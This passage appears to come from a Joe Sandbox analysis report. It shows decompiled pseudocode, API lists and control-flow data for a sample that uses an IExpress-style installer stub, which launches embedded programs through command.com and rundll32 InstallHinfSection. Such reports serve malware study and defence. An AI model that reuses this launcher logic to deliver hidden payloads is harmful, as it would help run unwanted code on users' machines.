                                                											if((_t144 & 0x00000010) != 0) {
                                                												_t97 = _t97 | 0x00040000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t145 =  *0xac8d48; // 0x0
                                                											__eflags = _t145 & 0x00000040;
                                                											if((_t145 & 0x00000040) != 0) {
                                                												_t97 = _t97 | 0x00080000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t145;
                                                											if(_t145 < 0) {
                                                												_t104 = _t97 | 0x00100000;
                                                												__eflags = _t104;
                                                												_v360 = _t104;
                                                											}
                                                											_t98 =  *0xac9a38; // 0x0
                                                											_v356 = _t98;
                                                											_t130 = _t146;
                                                											 *0xaca288( &_v384);
                                                											_t101 = _v404();
                                                											__eflags = _t164 - _t164;
                                                											if(_t164 != _t164) {
                                                												_t130 = 4;
                                                												asm("int 0x29");
                                                											}
                                                											 *0xac9124 = _t101;
                                                											_push(_t129);
                                                											__eflags = _t101;
                                                											if(_t101 < 0) {
                                                												FreeLibrary();
                                                												goto L61;
                                                											} else {
                                                												FreeLibrary();
                                                												_t127 = _v400;
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags =  *0xac9a40 - 1; // 0x3
                                                										if(__eflags == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags =  *0xac8a20;
                                                										if( *0xac8a20 == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags = _t157;
                                                										if(_t157 != 0) {
                                                											goto L38;
                                                										}
                                                										_v388 = 1;
                                                										E00AC202A(_t146); // executed
                                                										goto L37;
                                                									}
                                                									_t146 =  &_v280;
                                                									_t108 = E00AC468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                									__eflags = _t108;
                                                									if(_t108 == 0) {
                                                										goto L25;
                                                									}
                                                									__eflags =  *0xac8c42;
                                                									if( *0xac8c42 != 0) {
                                                										goto L69;
                                                									}
                                                									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                									__eflags = _t112 == 0;
                                                									if(_t112 == 0) {
                                                										goto L69;
                                                									}
                                                									goto L31;
                                                								}
                                                								_t118 =  *0xac8a38; // 0x0
                                                								if(_t118 == 0) {
                                                									L23:
                                                									if(_t153 != 0) {
                                                										goto L31;
                                                									}
                                                									_t146 =  &_v276;
                                                									if(E00AC468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                										goto L27;
                                                									}
                                                									goto L25;
                                                								}
                                                								if((_t118 & 0x00000001) == 0) {
                                                									__eflags = _t118 & 0x00000002;
                                                									if((_t118 & 0x00000002) == 0) {
                                                										goto L62;
                                                									}
                                                									_t140 = "USRQCMD";
                                                									L20:
                                                									_t146 =  &_v276;
                                                									if(E00AC468F(_t140,  &_v276, 0x104) == 0) {
                                                										goto L25;
                                                									}
                                                									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                										_t153 = 1;
                                                										_v388 = 1;
                                                									}
                                                									goto L23;
                                                								}
                                                								_t140 = "ADMQCMD";
                                                								goto L20;
                                                							}
                                                						}
                                                						L26:
                                                						_push(_t130);
                                                						_t146 = 0x104;
                                                						E00AC1781( &_v276, 0x104, _t130, 0xac8c42);
                                                						goto L27;
                                                					}
                                                				}
                                                				_t130 = "REBOOT";
                                                				_t125 = E00AC468F(_t130, 0xac9a2c, 4);
                                                				if(_t125 == 0 || _t125 > 4) {
                                                					goto L25;
                                                				} else {
                                                					goto L3;
                                                				}
                                                			}





























































                                                0x00ac3baa
                                                0x00ac3bb0
                                                0x00ac3bb7
                                                0x00ac3bc0
                                                0x00ac3bc2
                                                0x00ac3bc9
                                                0x00ac3bcb
                                                0x00ac3bcf
                                                0x00ac3bd3
                                                0x00ac3bd9
                                                0x00ac3bfd
                                                0x00ac3bfd
                                                0x00ac3bff
                                                0x00ac3c03
                                                0x00ac3c03
                                                0x00ac3c11
                                                0x00ac3c16
                                                0x00ac3c19
                                                0x00ac3c28
                                                0x00000000
                                                0x00000000
                                                0x00ac3c30
                                                0x00ac3c39
                                                0x00ac3c40
                                                0x00ac3d13
                                                0x00ac3d15
                                                0x00ac3d21
                                                0x00ac3d26
                                                0x00000000
                                                0x00ac3c4f
                                                0x00ac3c56
                                                0x00ac3c60
                                                0x00ac3c65
                                                0x00ac3c77
                                                0x00ac3c78
                                                0x00ac3c7c
                                                0x00ac3c7e
                                                0x00ac3c82
                                                0x00ac3c82
                                                0x00000000
                                                0x00ac3c7c
                                                0x00ac3c67
                                                0x00ac3c69
                                                0x00ac3c6d
                                                0x00000000
                                                0x00ac3c58
                                                0x00ac3c58
                                                0x00ac3c6e
                                                0x00ac3c6e
                                                0x00ac3c87
                                                0x00ac3c89
                                                0x00ac3d4d
                                                0x00ac3d4f
                                                0x00ac3d50
                                                0x00ac3d52
                                                0x00ac3d9e
                                                0x00ac3da8
                                                0x00ac3daf
                                                0x00ac3db4
                                                0x00ac3db6
                                                0x00ac3f4d
                                                0x00ac3f4d
                                                0x00ac3f4f
                                                0x00ac3f56
                                                0x00ac3f57
                                                0x00ac3f58
                                                0x00ac3f63
                                                0x00ac3f63
                                                0x00ac3dbc
                                                0x00ac3dc0
                                                0x00ac3dc2
                                                0x00ac3de6
                                                0x00ac3de6
                                                0x00ac3de8
                                                0x00ac3f0b
                                                0x00ac3f0b
                                                0x00ac3f0f
                                                0x00ac3f13
                                                0x00ac3f15
                                                0x00ac3f1a
                                                0x00ac3f1c
                                                0x00ac3f46
                                                0x00ac3f47
                                                0x00000000
                                                0x00ac3f47
                                                0x00ac3f1e
                                                0x00ac3f1f
                                                0x00ac3f25
                                                0x00ac3f26
                                                0x00ac3f2a
                                                0x00ac3f2d
                                                0x00ac3fd9
                                                0x00ac3fd9
                                                0x00ac3fda
                                                0x00ac3fda
                                                0x00ac3fe1
                                                0x00ac3fe3
                                                0x00ac3fe3
                                                0x00ac3fe8
                                                0x00000000
                                                0x00ac3fe8
                                                0x00ac3f33
                                                0x00ac3f37
                                                0x00000000
                                                0x00ac3f37
                                                0x00ac3dee
                                                0x00ac3dee
                                                0x00ac3df5
                                                0x00ac3fad
                                                0x00ac3fb9
                                                0x00ac3fc2
                                                0x00ac3fc8
                                                0x00000000
                                                0x00ac3fc8
                                                0x00ac3dfb
                                                0x00ac3dfd
                                                0x00000000
                                                0x00000000
                                                0x00ac3e03
                                                0x00ac3e0a
                                                0x00000000
                                                0x00000000
                                                0x00ac3e15
                                                0x00ac3e17
                                                0x00ac3e19
                                                0x00ac3f94
                                                0x00ac3fa4
                                                0x00ac3f7c
                                                0x00ac3f80
                                                0x00ac3f8b
                                                0x00000000
                                                0x00ac3f8b
                                                0x00ac3e2c
                                                0x00ac3e30
                                                0x00ac3e34
                                                0x00ac3e36
                                                0x00ac3f69
                                                0x00ac3f6e
                                                0x00ac3f70
                                                0x00ac3f76
                                                0x00000000
                                                0x00ac3f76
                                                0x00ac3e3c
                                                0x00ac3e43
                                                0x00ac3e47
                                                0x00ac3e52
                                                0x00ac3e56
                                                0x00ac3e5c
                                                0x00ac3e61
                                                0x00ac3e68
                                                0x00ac3e70
                                                0x00ac3e74
                                                0x00ac3e7c
                                                0x00ac3e80
                                                0x00ac3e82
                                                0x00ac3e82
                                                0x00ac3e87
                                                0x00ac3e87
                                                0x00ac3e8b
                                                0x00ac3e91
                                                0x00ac3e94
                                                0x00ac3e96
                                                0x00ac3e96
                                                0x00ac3e9b
                                                0x00ac3e9b
                                                0x00ac3e9f
                                                0x00ac3ea2
                                                0x00ac3ea4
                                                0x00ac3ea4
                                                0x00ac3ea9
                                                0x00ac3ea9
                                                0x00ac3ead
                                                0x00ac3eb3
                                                0x00ac3eb6
                                                0x00ac3eb8
                                                0x00ac3eb8
                                                0x00ac3ebd
                                                0x00ac3ebd
                                                0x00ac3ec1
                                                0x00ac3ec3
                                                0x00ac3ec5
                                                0x00ac3ec5
                                                0x00ac3eca
                                                0x00ac3eca
                                                0x00ac3ece
                                                0x00ac3ed5
                                                0x00ac3ed9
                                                0x00ac3ee0
                                                0x00ac3ee6
                                                0x00ac3eea
                                                0x00ac3eec
                                                0x00ac3eee
                                                0x00ac3ef3
                                                0x00ac3ef3
                                                0x00ac3ef5
                                                0x00ac3efa
                                                0x00ac3efb
                                                0x00ac3efd
                                                0x00ac3f40
                                                0x00000000
                                                0x00ac3eff
                                                0x00ac3eff
                                                0x00ac3f05
                                                0x00000000
                                                0x00ac3f05
                                                0x00ac3efd
                                                0x00ac3dc7
                                                0x00ac3dce
                                                0x00000000
                                                0x00000000
                                                0x00ac3dd0
                                                0x00ac3dd7
                                                0x00000000
                                                0x00000000
                                                0x00ac3dd9
                                                0x00ac3ddb
                                                0x00000000
                                                0x00000000
                                                0x00ac3ddd
                                                0x00ac3de1
                                                0x00000000
                                                0x00ac3de1
                                                0x00ac3d59
                                                0x00ac3d65
                                                0x00ac3d6a
                                                0x00ac3d6c
                                                0x00000000
                                                0x00000000
                                                0x00ac3d6e
                                                0x00ac3d75
                                                0x00000000
                                                0x00000000
                                                0x00ac3d8f
                                                0x00ac3d96
                                                0x00ac3d98
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac3d98
                                                0x00ac3c8f
                                                0x00ac3c98
                                                0x00ac3cf1
                                                0x00ac3cf3
                                                0x00000000
                                                0x00000000
                                                0x00ac3cfe
                                                0x00ac3d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac3d11
                                                0x00ac3c9c
                                                0x00ac3ca5
                                                0x00ac3ca7
                                                0x00000000
                                                0x00000000
                                                0x00ac3cad
                                                0x00ac3cb2
                                                0x00ac3cb7
                                                0x00ac3cc5
                                                0x00000000
                                                0x00000000
                                                0x00ac3ce8
                                                0x00ac3cec
                                                0x00ac3ced
                                                0x00ac3ced
                                                0x00000000
                                                0x00ac3ce8
                                                0x00ac3c9e
                                                0x00000000
                                                0x00ac3c9e
                                                0x00ac3c56
                                                0x00ac3d35
                                                0x00ac3d35
                                                0x00ac3d3c
                                                0x00ac3d48
                                                0x00000000
                                                0x00ac3d48
                                                0x00ac3c03
                                                0x00ac3be2
                                                0x00ac3be7
                                                0x00ac3bee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 00AC3C11
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00AC3CDC
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                  • Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
                                                  • Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                  • Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                  • Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
                                                  • Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00AC8C42), ref: 00AC3D8F
                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00AC3E26
                                                • FreeLibrary.KERNEL32(00000000,?,00AC8C42), ref: 00AC3EFF
                                                • LocalFree.KERNEL32(?,?,?,?,00AC8C42), ref: 00AC3F1F
                                                • FreeLibrary.KERNEL32(00000000,?,00AC8C42), ref: 00AC3F40
                                                • LocalFree.KERNEL32(?,?,?,?,00AC8C42), ref: 00AC3F47
                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00AC8C42), ref: 00AC3F76
                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00AC8C42), ref: 00AC3F80
                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00AC8C42), ref: 00AC3FC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
                                                • API String ID: 1032054927-740005631
                                                • Opcode ID: db3394edbe87b063f184cf1307829951faf7d343071f509472bc32332eb43a02
                                                • Instruction ID: 2d87ba4918ab77b75d5f1de07b141f42f97d5f4f12afb6764ef60abbede11a40
                                                • Opcode Fuzzy Hash: db3394edbe87b063f184cf1307829951faf7d343071f509472bc32332eb43a02
                                                • Instruction Fuzzy Hash: 43B11072A083019BDB20DF648945F6B76E4EB85740F138D2DFA96D6190DB74CE06CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 ac1ae8-ac1b2c call ac1680 144 ac1b2e-ac1b39 141->144 145 ac1b3b-ac1b40 141->145 146 ac1b46-ac1b61 call ac1a84 144->146 145->146 149 ac1b9f-ac1bc2 call ac1781 call ac658a 146->149 150 ac1b63-ac1b65 146->150 157 ac1bc7-ac1bd3 call ac66c8 149->157 152 ac1b68-ac1b6d 150->152 152->152 154 ac1b6f-ac1b74 152->154 154->149 156 ac1b76-ac1b7b 154->156 158 ac1b7d-ac1b81 156->158 159 ac1b83-ac1b86 156->159 165 ac1bd9-ac1bf1 CompareStringA 157->165 166 ac1d73-ac1d7f call ac66c8 157->166 158->159 161 ac1b8c-ac1b9d call ac1680 158->161 159->149 162 ac1b88-ac1b8a 159->162 161->157 162->149 162->161 165->166 168 ac1bf7-ac1c07 GetFileAttributesA 165->168 175 ac1df8-ac1e09 LocalAlloc 166->175 176 ac1d81-ac1d99 CompareStringA 166->176 170 ac1c0d-ac1c15 168->170 171 ac1d53-ac1d5e 168->171 170->171 174 ac1c1b-ac1c33 call ac1a84 170->174 173 ac1d64-ac1d6e call ac44b9 171->173 188 ac1e94-ac1ea4 call ac6ce0 173->188 190 ac1c35-ac1c38 174->190 191 ac1c50-ac1c61 LocalAlloc 174->191 178 ac1e0b-ac1e1b GetFileAttributesA 175->178 179 ac1dd4-ac1ddf 175->179 176->175 181 ac1d9b-ac1da2 176->181 183 ac1e1d-ac1e1f 178->183 184 ac1e67-ac1e73 call ac1680 178->184 179->173 186 ac1da5-ac1daa 181->186 183->184 189 ac1e21-ac1e3e call ac1781 183->189 194 ac1e78-ac1e84 call ac2aac 184->194 186->186 192 ac1dac-ac1db4 186->192 189->194 211 ac1e40-ac1e43 189->211 197 ac1c3a 190->197 198 ac1c40-ac1c4b call ac1a84 190->198 191->179 193 ac1c67-ac1c72 191->193 199 ac1db7-ac1dbc 192->199 202 ac1c79-ac1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->202 203 ac1c74 193->203 210 ac1e89-ac1e92 194->210 197->198 198->191 199->199 201 ac1dbe-ac1dd2 LocalAlloc 199->201 201->179 207 ac1de1-ac1df3 call ac171e 201->207 208 ac1cf8-ac1d07 202->208 209 ac1cc2-ac1ccc 202->209 203->202 207->210 216 ac1d09-ac1d21 GetShortPathNameA 208->216 217 ac1d23 208->217 213 ac1cce 209->213 214 ac1cd3-ac1cf3 call ac1680 * 2 209->214 210->188 211->194 215 ac1e45-ac1e65 call ac16b3 * 2 211->215 213->214 214->210 215->194 221 ac1d28-ac1d2b 216->221 217->221 222 ac1d2d 221->222 223 ac1d32-ac1d4e call ac171e 221->223 222->223 223->210
                                                C-Code - Quality: 82%
                                                			E00AC1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v527;
                                                				char _v528;
                                                				char _v1552;
                                                				CHAR* _v1556;
                                                				int* _v1560;
                                                				CHAR** _v1564;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t48;
                                                				CHAR* _t53;
                                                				CHAR* _t54;
                                                				char* _t57;
                                                				char* _t58;
                                                				CHAR* _t60;
                                                				void* _t62;
                                                				signed char _t65;
                                                				intOrPtr _t76;
                                                				intOrPtr _t77;
                                                				unsigned int _t85;
                                                				CHAR* _t90;
                                                				CHAR* _t92;
                                                				char _t105;
                                                				char _t106;
                                                				CHAR** _t111;
                                                				CHAR* _t115;
                                                				intOrPtr* _t125;
                                                				void* _t126;
                                                				CHAR* _t132;
                                                				CHAR* _t135;
                                                				void* _t138;
                                                				void* _t139;
                                                				void* _t145;
                                                				intOrPtr* _t146;
                                                				char* _t148;
                                                				CHAR* _t151;
                                                				void* _t152;
                                                				CHAR* _t155;
                                                				CHAR* _t156;
                                                				void* _t157;
                                                				signed int _t158;
                                                
                                                				_t48 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t48 ^ _t158;
                                                				_t108 = __ecx;
                                                				_v1564 = _a4;
                                                				_v1560 = _a8;
                                                				E00AC1680( &_v528, 0x104, __ecx);
                                                				if(_v528 != 0x22) {
                                                					_t135 = " ";
                                                					_t53 =  &_v528;
                                                				} else {
                                                					_t135 = "\"";
                                                					_t53 =  &_v527;
                                                				}
                                                				_t111 =  &_v1556;
                                                				_v1556 = _t53;
                                                				_t54 = E00AC1A84(_t111, _t135);
                                                				_t156 = _v1556;
                                                				_t151 = _t54;
                                                				if(_t156 == 0) {
                                                					L12:
                                                					_push(_t111);
                                                					E00AC1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                					E00AC658A( &_v268, 0x104, _t156);
                                                					goto L13;
                                                				} else {
                                                					_t132 = _t156;
                                                					_t148 =  &(_t132[1]);
                                                					do {
                                                						_t105 =  *_t132;
                                                						_t132 =  &(_t132[1]);
                                                					} while (_t105 != 0);
                                                					_t111 = _t132 - _t148;
                                                					if(_t111 < 3) {
                                                						goto L12;
                                                					}
                                                					_t106 = _t156[1];
                                                					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                							goto L12;
                                                						} else {
                                                							goto L11;
                                                						}
                                                					} else {
                                                						L11:
                                                						E00AC1680( &_v268, 0x104, _t156);
                                                						L13:
                                                						_t138 = 0x2e;
                                                						_t57 = E00AC66C8(_t156, _t138);
                                                						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                							_t139 = 0x2e;
                                                							_t115 = _t156;
                                                							_t58 = E00AC66C8(_t115, _t139);
                                                							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                								_t156 = LocalAlloc(0x40, 0x400);
                                                								if(_t156 == 0) {
                                                									goto L43;
                                                								}
                                                								_t65 = GetFileAttributesA( &_v268); // executed
                                                								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                									E00AC1680( &_v1552, 0x400, _t108);
                                                								} else {
                                                									_push(_t115);
                                                									_t108 = 0x400;
                                                									E00AC1781( &_v1552, 0x400, _t115,  &_v268);
                                                									if(_t151 != 0 &&  *_t151 != 0) {
                                                										E00AC16B3( &_v1552, 0x400, " ");
                                                										E00AC16B3( &_v1552, 0x400, _t151);
                                                									}
                                                								}
                                                								_t140 = _t156;
                                                								 *_t156 = 0;
                                                								E00AC2AAC( &_v1552, _t156, _t156);
                                                								goto L53;
                                                							} else {
                                                								_t108 = "Command.com /c %s";
                                                								_t125 = "Command.com /c %s";
                                                								_t145 = _t125 + 1;
                                                								do {
                                                									_t76 =  *_t125;
                                                									_t125 = _t125 + 1;
                                                								} while (_t76 != 0);
                                                								_t126 = _t125 - _t145;
                                                								_t146 =  &_v268;
                                                								_t157 = _t146 + 1;
                                                								do {
                                                									_t77 =  *_t146;
                                                									_t146 = _t146 + 1;
                                                								} while (_t77 != 0);
                                                								_t140 = _t146 - _t157;
                                                								_t154 = _t126 + 8 + _t146 - _t157;
                                                								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                								if(_t156 != 0) {
                                                									E00AC171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                									goto L53;
                                                								}
                                                								goto L43;
                                                							}
                                                						} else {
                                                							_t85 = GetFileAttributesA( &_v268);
                                                							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                								_t140 = 0x525;
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_t60 =  &_v268;
                                                								goto L35;
                                                							} else {
                                                								_t140 = "[";
                                                								_v1556 = _t151;
                                                								_t90 = E00AC1A84( &_v1556, "[");
                                                								if(_t90 != 0) {
                                                									if( *_t90 != 0) {
                                                										_v1556 = _t90;
                                                									}
                                                									_t140 = "]";
                                                									E00AC1A84( &_v1556, "]");
                                                								}
                                                								_t156 = LocalAlloc(0x40, 0x200);
                                                								if(_t156 == 0) {
                                                									L43:
                                                									_t60 = 0;
                                                									_t140 = 0x4b5;
                                                									_push(0);
                                                									_push(0x10);
                                                									_push(0);
                                                									L35:
                                                									_push(_t60);
                                                									E00AC44B9(0, _t140);
                                                									_t62 = 0;
                                                									goto L54;
                                                								} else {
                                                									_t155 = _v1556;
                                                									_t92 = _t155;
                                                									if( *_t155 == 0) {
                                                										_t92 = "DefaultInstall";
                                                									}
                                                									 *0xac9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                									 *_v1560 = 1;
                                                									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xac1140, _t156, 8,  &_v268) == 0) {
                                                										 *0xac9a34 =  *0xac9a34 & 0xfffffffb;
                                                										if( *0xac9a40 != 0) {
                                                											_t108 = "setupapi.dll";
                                                										} else {
                                                											_t108 = "setupx.dll";
                                                											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                										}
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										_push( &_v268);
                                                										_push(_t155);
                                                										E00AC171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                									} else {
                                                										 *0xac9a34 =  *0xac9a34 | 0x00000004;
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										E00AC1680(_t108, 0x104, _t155);
                                                										_t140 = 0x200;
                                                										E00AC1680(_t156, 0x200,  &_v268);
                                                									}
                                                									L53:
                                                									_t62 = 1;
                                                									 *_v1564 = _t156;
                                                									L54:
                                                									_pop(_t152);
                                                									return E00AC6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}














































                                                0x00ac1af3
                                                0x00ac1afa
                                                0x00ac1b07
                                                0x00ac1b09
                                                0x00ac1b1a
                                                0x00ac1b20
                                                0x00ac1b2c
                                                0x00ac1b3b
                                                0x00ac1b40
                                                0x00ac1b2e
                                                0x00ac1b2e
                                                0x00ac1b33
                                                0x00ac1b33
                                                0x00ac1b46
                                                0x00ac1b4c
                                                0x00ac1b52
                                                0x00ac1b57
                                                0x00ac1b5d
                                                0x00ac1b61
                                                0x00ac1b9f
                                                0x00ac1b9f
                                                0x00ac1bb1
                                                0x00ac1bc2
                                                0x00000000
                                                0x00ac1b63
                                                0x00ac1b63
                                                0x00ac1b65
                                                0x00ac1b68
                                                0x00ac1b68
                                                0x00ac1b6a
                                                0x00ac1b6b
                                                0x00ac1b6f
                                                0x00ac1b74
                                                0x00000000
                                                0x00000000
                                                0x00ac1b76
                                                0x00ac1b7b
                                                0x00ac1b86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac1b8c
                                                0x00ac1b8c
                                                0x00ac1b98
                                                0x00ac1bc7
                                                0x00ac1bc9
                                                0x00ac1bcc
                                                0x00ac1bd3
                                                0x00ac1d75
                                                0x00ac1d76
                                                0x00ac1d78
                                                0x00ac1d7f
                                                0x00ac1e05
                                                0x00ac1e09
                                                0x00000000
                                                0x00000000
                                                0x00ac1e12
                                                0x00ac1e1b
                                                0x00ac1e73
                                                0x00ac1e21
                                                0x00ac1e21
                                                0x00ac1e28
                                                0x00ac1e37
                                                0x00ac1e3e
                                                0x00ac1e52
                                                0x00ac1e60
                                                0x00ac1e60
                                                0x00ac1e3e
                                                0x00ac1e79
                                                0x00ac1e7b
                                                0x00ac1e84
                                                0x00000000
                                                0x00ac1d9b
                                                0x00ac1d9b
                                                0x00ac1da0
                                                0x00ac1da2
                                                0x00ac1da5
                                                0x00ac1da5
                                                0x00ac1da7
                                                0x00ac1da8
                                                0x00ac1dac
                                                0x00ac1dae
                                                0x00ac1db4
                                                0x00ac1db7
                                                0x00ac1db7
                                                0x00ac1db9
                                                0x00ac1dba
                                                0x00ac1dbe
                                                0x00ac1dc3
                                                0x00ac1dce
                                                0x00ac1dd2
                                                0x00ac1deb
                                                0x00000000
                                                0x00ac1df0
                                                0x00000000
                                                0x00ac1dd2
                                                0x00ac1bf7
                                                0x00ac1bfe
                                                0x00ac1c07
                                                0x00ac1d55
                                                0x00ac1d5a
                                                0x00ac1d5b
                                                0x00ac1d5d
                                                0x00ac1d5e
                                                0x00000000
                                                0x00ac1c1b
                                                0x00ac1c1b
                                                0x00ac1c20
                                                0x00ac1c2c
                                                0x00ac1c33
                                                0x00ac1c38
                                                0x00ac1c3a
                                                0x00ac1c3a
                                                0x00ac1c40
                                                0x00ac1c4b
                                                0x00ac1c4b
                                                0x00ac1c5d
                                                0x00ac1c61
                                                0x00ac1dd4
                                                0x00ac1dd4
                                                0x00ac1dd6
                                                0x00ac1ddb
                                                0x00ac1ddc
                                                0x00ac1dde
                                                0x00ac1d64
                                                0x00ac1d64
                                                0x00ac1d67
                                                0x00ac1d6c
                                                0x00000000
                                                0x00ac1c67
                                                0x00ac1c67
                                                0x00ac1c6d
                                                0x00ac1c72
                                                0x00ac1c74
                                                0x00ac1c74
                                                0x00ac1c8e
                                                0x00ac1c99
                                                0x00ac1cc0
                                                0x00ac1cf8
                                                0x00ac1d07
                                                0x00ac1d23
                                                0x00ac1d09
                                                0x00ac1d14
                                                0x00ac1d1b
                                                0x00ac1d1b
                                                0x00ac1d2b
                                                0x00ac1d2d
                                                0x00ac1d2d
                                                0x00ac1d38
                                                0x00ac1d39
                                                0x00ac1d46
                                                0x00ac1cc2
                                                0x00ac1cc2
                                                0x00ac1ccc
                                                0x00ac1cce
                                                0x00ac1cce
                                                0x00ac1cdb
                                                0x00ac1ce6
                                                0x00ac1cee
                                                0x00ac1cee
                                                0x00ac1e89
                                                0x00ac1e91
                                                0x00ac1e92
                                                0x00ac1e94
                                                0x00ac1e97
                                                0x00ac1ea4
                                                0x00ac1ea4
                                                0x00ac1c61
                                                0x00ac1c07
                                                0x00ac1bd3
                                                0x00ac1b7b

                                                APIs
                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00AC1BE7
                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00AC1BFE
                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00AC1C57
                                                • GetPrivateProfileIntA.KERNEL32 ref: 00AC1C88
                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00AC1140,00000000,00000008,?), ref: 00AC1CB8
                                                • GetShortPathNameA.KERNEL32 ref: 00AC1D1B
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
